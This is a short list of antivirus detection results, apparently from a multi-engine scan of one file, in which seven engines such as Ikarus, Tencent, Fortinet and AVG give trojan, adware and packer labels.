Ikarus Trojan.MSIL.Disabler
Zoner Probably Heur.ExeHeaderL
Tencent Win32.Trojan.Deyma.Vimw
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Themida.HZB!tr
AVG Win32:AdwareX-gen [Adw]
alibabacloud Trojan:Win/Wacatac.B9nj